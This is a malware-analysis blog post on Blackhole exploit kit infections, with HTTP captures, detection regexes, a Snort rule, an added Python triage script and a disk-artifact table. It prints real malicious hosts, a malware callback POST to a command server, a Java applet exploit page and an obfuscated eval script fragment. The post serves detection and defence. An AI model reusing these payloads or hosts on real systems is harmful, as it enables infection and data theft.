<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">HTTP/1.1 200 OK</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>Server: nginx/1.0.10</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">Date: Sun, 07 Oct 2012 05:09:02 GMT</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>Content-Type: application/x-msdownload</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">Connection: keep-alive</span><br />
<span style="font-family: Courier New, Courier, monospace;">X-Powered-By: PHP/5.3.17-1~dotdeb.0</span><br />
<span style="font-family: Courier New, Courier, monospace;">Pragma: public</span><br />
<span style="font-family: Courier New, Courier, monospace;">Expires: Sun, 07 Oct 2012 12:42:41 GMT</span><br />
<span style="font-family: Courier New, Courier, monospace;">Cache-Control: must-revalidate, post-check=0, pre-check=0</span><br />
<span style="font-family: Courier New, Courier, monospace;">Cache-Control: private</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>Content-Disposition: attachment; filename="readme.exe"</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>Content-Transfer-Encoding: binary</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">Content-Length: 92160</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">MZ......................@...............................................!..L.!This program cannot be run in DOS mode.</span><br />
<br />
<br />
<span style="font-family: inherit;"><br /></span>
<br />
<h3>
<span style="font-family: inherit; font-size: small;">URL Pattern Analysis:</span></h3>
The most interesting point in my URL analysis of the samples I saw was that they all contained a "?" followed by 2 to 10 lowercase characters, then "=", then hexadecimal in 10-character increments, with as many as 70 characters (10, 20 and 70 to be precise). The secondary parameter in the URL is always shorter.<br />
<br />
<span style="font-family: inherit;">I believe there is a good enough pattern for a URL regex here, once pre-qualified for a Java user agent, no </span>referrer<span style="font-family: inherit;">, or both. </span><br />
<br />
Generic detection: \.php\?\w{2,10}\=[0-9a-f]{10,70}\&\w{2,10}\=\w.*\&\w{2,10}\=\w<br />
<span style="font-family: inherit;"><br /></span>
<br />
<h3>
<span style="font-family: inherit; font-size: small;">Callback</span></h3>
This particular sample had a <a href="http://stopmalvertising.com/rootkits/analysis-of-cridex.html" target="_blank">Cridex-like rootkit</a> callout with what looked like a SpyEye sample. On the disk, the file names (again) were <span style="background-color: black; font-family: inherit;"> <b style="line-height: 18px;">wgsdgsdgdsgsd.exe as well as a KB<randomnumber>.exe.</b></span><br />
<br />
<br />
<pre class="dualColTextStyle" hasbox="2"><span style="font-family: Courier New, Courier, monospace;">POST /mx/5/A/in/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 41.168.5.140:8080
Content-Length: 350
Connection: Keep-Alive
Cache-Control: no-cache</span></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">Generic Detection: \w{2}\/\w.*\/in\/$</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">This user agent is identified in multiple malware samples as post infection activity and the URL string is consistent with Cridex rootkit, while the malware sample was consistent with Spyeye.</pre>
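The two generic detections above (the exploit kit URL regex with its Java user agent / no-referrer pre-qualification, and the /in/ callback regex), run over request heads taken from this post's captures plus one constructed benign request. This is an added example, not code from the original post; the Java/x.y user-agent test, the FIRST_HEX helper and the verdict names are assumptions.

```python
import re

# Both URI patterns are copied verbatim from the post.
EK_URI = re.compile(
    r"\.php\?\w{2,10}\=[0-9a-f]{10,70}\&\w{2,10}\=\w.*\&\w{2,10}\=\w", re.ASCII)
CALLBACK_URI = re.compile(r"\w{2}\/\w.*\/in\/$", re.ASCII)
# Assumption: "user agent java" is read as a Java/<digit> token in the UA.
JAVA_UA = re.compile(r"\bJava/\d")
# Hypothetical helper: captures the hex run of the first parameter so its
# length can be compared with the 10-character increments the post observed.
FIRST_HEX = re.compile(r"\.php\?\w{2,10}=([0-9a-f]+)&", re.ASCII)


def parse_request(raw):
    """Split a captured request head into (method, uri, lower-cased headers)."""
    lines = raw.strip().splitlines()
    method, uri = lines[0].split()[:2]
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # a blank line ends the header block
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, uri, headers


def triage(raw):
    """Apply the post's regexes and its pre-qualification to one request."""
    method, uri, headers = parse_request(raw)
    java_ua = bool(JAVA_UA.search(headers.get("user-agent", "")))
    no_referer = "referer" not in headers
    prequalified = java_ua or no_referer  # "java or no referrer or both"
    hex_match = FIRST_HEX.search(uri)
    hex_len = len(hex_match.group(1)) if hex_match else 0
    if CALLBACK_URI.search(uri):
        verdict = "callback"
    elif EK_URI.search(uri):
        verdict = "ek-request" if prequalified else "uri-match-only"
    else:
        verdict = "none"
    return {"method": method, "verdict": verdict, "java_ua": java_ua,
            "no_referer": no_referer, "hex_len": hex_len,
            "hex_in_tens": hex_len > 0 and hex_len % 10 == 0}


# Request heads: the first three are from this post's captures (headers
# trimmed); "benign" is constructed to show a regex hit on ordinary traffic.
SAMPLES = {
    "java_fetch": """GET /forum/links/column.php?boaz=0735020b0b&zpjqh=3f38&yztospu=evicnt&utkfuo=ijdxvx HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29
Host: sonatanamore.ru:8080
""",
    "pdf_fetch": """GET /forum/links/column.php?zbyg=0735020b0b&dcgdi=4b&ayj=3307093738070736060b&okn=02000200020002 HTTP/1.1
Referer: http://sonatanamore.ru:8080/forum/links/column.php
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: sonatanamore.ru:8080
""",
    "callback": """POST /mx/5/A/in/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 41.168.5.140:8080
""",
    "benign": """GET /index.php?id=1234567890&page=2&sort=asc HTTP/1.1
Referer: http://www.example.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: www.example.com
""",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, triage(raw))
```

The browser's own PDF request and the constructed benign URL both come out as uri-match-only: the regex alone matches ordinary ten-digit IDs, and the pre-qualification that suppresses that noise also drops kit requests that carry a Referer.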
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">References:</pre>
<pre class="dualColTextStyle" hasbox="2"><a href="http://lists.emergingthreats.net/pipermail/emerging-sigs/2011-August/015413.html">http://lists.emergingthreats.net/pipermail/emerging-sigs/2011-August/015413.html</a></pre>
<a href="http://malwr.com/analysis/7d663d3f7d93ba2b32d456b861686501/">http://malwr.com/analysis/7d663d3f7d93ba2b32d456b861686501/</a><br />
<a href="http://spamalysis.wordpress.com/2012/03/05/spammed-goo-gl-links/">http://spamalysis.wordpress.com/2012/03/05/spammed-goo-gl-links/</a><br />
<a href="http://www.spamhaus.org/news/article/680/">http://www.spamhaus.org/news/article/680/</a><br />
<a href="http://stopmalvertising.com/rootkits/analysis-of-cridex.html">http://stopmalvertising.com/rootkits/analysis-of-cridex.html</a><br />
<a href="http://fortknoxnetworks.blogspot.com/2012/09/blackhole-disk-artifacts-complete-dump.html">http://fortknoxnetworks.blogspot.com/2012/09/blackhole-disk-artifacts-complete-dump.html</a><br />
<a href="http://fortknoxnetworks.blogspot.com/2012/09/new-fake-av-strain-url-callbacks.html">http://fortknoxnetworks.blogspot.com/2012/09/new-fake-av-strain-url-callbacks.html</a><br />
<a href="http://user-agent-string.info/?Fuas=Mozilla%2F4.0+(Windows+XP+5.1)+Java%2F1.6.0_29&test=7823&action=analyze">http://user-agent-string.info/?Fuas=Mozilla%2F4.0+(Windows+XP+5.1)+Java%2F1.6.0_29&test=7823&action=analyze</a><br />
<span style="background-color: white; color: #009933; font-family: arial, sans-serif; font-size: x-small; line-height: 15px;"><a href="http://blog.fireeye.com/research/2010/06/neosploit_notes.html">http://blog.fireeye.com/research/2010/06/neosploit_notes.html</a></span><br />
<a href="http://wepawet.iseclab.org/view.php?hash=b7cb2a698f35209f9b70eb7361e1162f&type=js">http://wepawet.iseclab.org/view.php?hash=b7cb2a698f35209f9b70eb7361e1162f&type=js</a><br />
<a href="http://jsunpack.jeek.org/?report=b2f98dbcf33f74b9d99b6a6d975f9e4fb26289b5">http://jsunpack.jeek.org/?report=b2f98dbcf33f74b9d99b6a6d975f9e4fb26289b5</a><br />
<br />
<br />
<br />Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-82480357136468676192012-09-22T12:08:00.000-07:002012-09-22T12:24:57.350-07:00Blackhole Disk Artifacts - A Complete DumpRecently, I've been concentrating my activities on disk artifacts post-infection. Today, I fired up my lab and infected a system while grabbing as much information as possible.<br />
<br />
<b>Infection Point: </b>hxxp://46.249.59.116/main.php?page=5a56c997ffff2f79<br />
<br />
<b>Date: </b>09/22/2012<br />
<br />
<b>Platform: </b>Windows XP Pro, SP3, unpatched, Java 6 Update 29, Windows Media Player 9, No Adobe Flash, No Adobe Reader, IE 8, Windows Firewall Disabled, No AV.<br />
<br />
<b>Retention: </b>Once this completed I took a full snapshot of the entire disk, to share or analyze further later. If you would like it, just twitter me @fknsec. The snapshot is about 1GB uncompressed.<br />
<br />
<b>Methodology:</b> A snapshot of the entire disk and registry was taken prior to infection and compared against post infection for delta. Wireshark and IE were the only active applications on the system. I used Wireshark, Installrite, VirtualBox, Windows XP and IE8. It should be noted that in the disk capture, Windows Media player did go through its initial startup.<br />
<br />
<div style="text-align: center;">
<span style="font-size: large;">The Infection</span></div>
<br />
First and foremost, I entered the URL into Internet Explorer, where Java launched and I was presented with the standard "Please wait while page is loading" in the center of the screen. The first file served up to me was Gam.jar. The response is nginx with chunked transfer encoding, nothing unusual here.<br />
<br />
<blockquote class="tr_bq">
<blockquote class="tr_bq">
GET /main.php?page=5a56c997ffff2f79 HTTP/1.1</blockquote>
<blockquote class="tr_bq">
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*</blockquote>
<blockquote class="tr_bq">
Accept-Language: en-us</blockquote>
<blockquote class="tr_bq">
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)</blockquote>
<blockquote class="tr_bq">
Accept-Encoding: gzip, deflate</blockquote>
<blockquote class="tr_bq">
Host: 46.249.59.116</blockquote>
<blockquote class="tr_bq">
Connection: Keep-Alive</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
HTTP/1.1 200 OK</blockquote>
<blockquote class="tr_bq">
Server: nginx</blockquote>
<blockquote class="tr_bq">
Date: Sat, 22 Sep 2012 16:32:10 GMT</blockquote>
<blockquote class="tr_bq">
Content-Type: text/html</blockquote>
<blockquote class="tr_bq">
Transfer-Encoding: chunked</blockquote>
<blockquote class="tr_bq">
Connection: keep-alive</blockquote>
<blockquote class="tr_bq">
X-Powered-By: PHP/5.3.15</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
1fb8</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
<html><body><applet archive="Gam.jar"/code="plugindetecta.plugindetecta"><param name="uid" value=N0b0909041f31312b343c272b3e3c423e3c373734310a3c040b043d2c393e2900373e0235391c /></applet><script>md="a";r="replace";rrr="getAttribute";rr="reverse";</script><b id="b"</blockquote>
</blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhashLaBKbDPCWGPcG2P3zHNKFfb5yW1CqPLWKP38M5L2eahD9TISEwege5uMDBuspM-UGUaxDBeK_3ScRZizF5u_ZoiQxVxKGplh8BwkOxCUflv0ugJDV7_26CJ8_eeSsxrUgXw0bypJM/s1600/gam.jar.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhashLaBKbDPCWGPcG2P3zHNKFfb5yW1CqPLWKP38M5L2eahD9TISEwege5uMDBuspM-UGUaxDBeK_3ScRZizF5u_ZoiQxVxKGplh8BwkOxCUflv0ugJDV7_26CJ8_eeSsxrUgXw0bypJM/s320/gam.jar.png" width="320" /></a></div>
Searching on the opening of the response (offset 0), I come up with 313 hits in Google, mostly from jsunpack, including some variations like this (with a missing "/" after Gam.jar):<br />
<blockquote class="tr_bq">
<html><body><applet archive="Gam.jar" code="importantThinga.importantThinga"></blockquote>
<a href="http://jsunpack.jeek.org/dec/go?report=cecd770436c23a953511f66befcc12da8cbeb7cb">http://jsunpack.jeek.org/dec/go?report=cecd770436c23a953511f66befcc12da8cbeb7cb</a><br />
<br />
Additionally, some of the entries noted come back with the <script>abre variant, which is all too common with SQL-injected WordPress pages.<br />
<blockquote class="tr_bq">
<script>try{awebw++;}catch(awtbawt){try{nta23t|15232}catch(tabsd){m=Math;ev=window[""+"e"+"val"];</blockquote>
<a href="http://jsunpack.jeek.org/dec/go?report=71f9a841aeebe2944633c46950f9848a4a8c8bb6">http://jsunpack.jeek.org/dec/go?report=71f9a841aeebe2944633c46950f9848a4a8c8bb6</a>
<br />
<br />
I am currently aware of approximately 1,600+ WordPress sites which are currently infected with this script. Some of these triggered AVG's online shield.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj15-oNxEQBFWFz8lit8Dmh0oLdOYQs9rjJryFXkchSxH1qJ0wPMpND9J77oVaWW6qRGgSex1qu1pK6kh5BKsHproOWhd3Zx4o8p2ZRjmrM87FrPyyTyWSMo6a_05SwHi8-DA4MrYG2KD8/s1600/avg-online-shield-detection.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj15-oNxEQBFWFz8lit8Dmh0oLdOYQs9rjJryFXkchSxH1qJ0wPMpND9J77oVaWW6qRGgSex1qu1pK6kh5BKsHproOWhd3Zx4o8p2ZRjmrM87FrPyyTyWSMo6a_05SwHi8-DA4MrYG2KD8/s320/avg-online-shield-detection.PNG" width="320" /></a></div>
<br />
<br />
Next, Windows Media Player was launched with the file name<b> hcp_asx</b>. I found it interesting that this version of Blackhole hit Windows Media Player for exploit before any other available exploits on the system. I am not going to get into this because some analysis already exists <a href="http://blog.webroot.com/2011/11/11/this-blackhole-exploit-kit-gives-you-windows-media-player-and-a-whole-lot-more/" target="_blank">here</a> and those of you using Snort are likely familiar with this rule:<br />
<br />
<span style="background-color: black; color: white;"><span style="font-family: monospace; font-size: 13px; line-height: 18px;">emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET</span><br style="font-family: monospace; font-size: 13px; line-height: 18px;" /><span style="font-family: monospace; font-size: 13px; line-height: 18px;">$HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP ovflow Media</span><br style="font-family: monospace; font-size: 13px; line-height: 18px;" /><span style="font-family: monospace; font-size: 13px; line-height: 18px;">Player lt 10"; flow:established,to_server; content:"/hcp_asx.php?f=";</span><br style="font-family: monospace; font-size: 13px; line-height: 18px;" /><span style="font-family: monospace; font-size: 13px; line-height: 18px;">http_uri; pcre:"/hcp_asx\.php\?f=\d+$/U"; classtype:trojan-activity;</span><br style="font-family: monospace; font-size: 13px; line-height: 18px;" /><span style="font-family: monospace; font-size: 13px; line-height: 18px;">sid:2013077; rev:1;)</span></span>
<br />
<br />
So the system was compromised by Blackhole and a bunch of stuff happened. Let's look at what happens on the disk. The binary was delivered as an HTTP attachment.<br />
<br />
<br />
<blockquote class="tr_bq">
GET /w.php?f=97d19&e=0 HTTP/1.1<br />
User-Agent: Java/1.6.0_29<br />
Host: 46.249.59.116<br />
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2<br />
Connection: keep-alive<br />
<br />
<br />
HTTP/1.1 200 OK<br />
Server: nginx<br />
Date: Sat, 22 Sep 2012 16:32:21 GMT<br />
Content-Type: application/x-msdownload<br />
Connection: keep-alive<br />
X-Powered-By: PHP/5.3.15<br />
Pragma: public<br />
Expires: Sat, 22 Sep 2012 16:32:21 GMT<br />
Cache-Control: must-revalidate, post-check=0, pre-check=0<br />
Cache-Control: private<br />
Content-Disposition: attachment; filename="about.exe"<br />
Content-Transfer-Encoding: binary<br />
Content-Length: 288615<br />
<br />
<br />
MZ......................@...............................................!..L.!This program cannot be run in DOS mode.</blockquote>
<br />
No callouts were observed.<br />
<div style="text-align: center;">
<span style="font-size: large;">What Happened on The Disk</span></div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
The creation of <b>v.class</b> by the root process java, as well as the downloader <b>wgsdgsdgdsgsd.exe</b> in the user's temp folder, is consistent with most of the activity I have been analyzing lately.</div>
<br />
A full list is included here of all the files created, edited (size changes) and deleted from the system, as well as all registry entries.<br />
<span style="background-color: black;"><span style="color: white;"><br /></span></span>
I was well aware of hsperfdata_%username% as a disk artifact, not necessarily of infection, but as an indicator that java had executed at a specific time/date stamp. There were a series of cache folders and files that were also created under....<br />
<b><br /></b>
<b>documents and settings\%username%\Application Data\Sun\Java\Deployment\cache\6.0</b><br />
<br />
<b><br /></b>
Anywho... here is a dump of all the delta from the disk. Admittedly, some of this is the result of normal operations; however, I believe there is some good information on disk artifacts, including the hsperfdata and the Java cache information.<br />
<br />
<br />
<br />
<b>backhole1 - All Files</b><br />
<br />
<table border="1" cellpadding="2" cellspacing="0" style="width: 100%;">
<tbody>
<tr>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">FileName</span></th>
<th align="right" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Size Before</span></th>
<th align="right" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Size After</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Attrib Before</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Attrib After</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Date Before</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Date After</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Version Before</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Version After</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">CRC Before</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">CRC After</span></th>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Cesy</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Cesy\aqowe.ydb</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:00 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Feuw</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">289KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:30 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Riafew</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Riafew\xiryq.quy</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:30 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\11</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\12</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\13</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\14</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\15</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Cookies\index.dat</span></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:25:05 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:01 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Feeds Cache\index.dat</span></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:16:43 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:34 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\DOMStore\index.dat</span></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:16:43 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:29:35 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\DOMStore\A9JWFLPR\www.google[1].xml</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:16:54 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:05 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG</span></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td><span style="color: black; font-size: xx-small;">HA</span></td>
<td><span style="color: black; font-size: xx-small;">HA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:25:23 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:45 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.XML</span></td>
<td><span style="color: black; font-size: xx-small;">13KB</span></td>
<td><span style="color: black; font-size: xx-small;">13KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:35:30 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:25 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\History\History.IE5\index.dat</span></td>
<td><span style="color: black; font-size: xx-small;">66KB</span></td>
<td><span style="color: black; font-size: xx-small;">66KB</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:25:05 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:01 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\History\History.IE5\MSHist012012092220120923\index.dat</span></td>
<td><span style="color: black; font-size: xx-small;">50KB</span></td>
<td><span style="color: black; font-size: xx-small;">50KB</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:16:43 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:15 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temp\jusched.log</span></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td><span style="color: black; font-size: xx-small;">9KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:25:07 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:11 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\index.dat</span></td>
<td><span style="color: black; font-size: xx-small;">443KB</span></td>
<td><span style="color: black; font-size: xx-small;">476KB</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:25:05 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:01 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
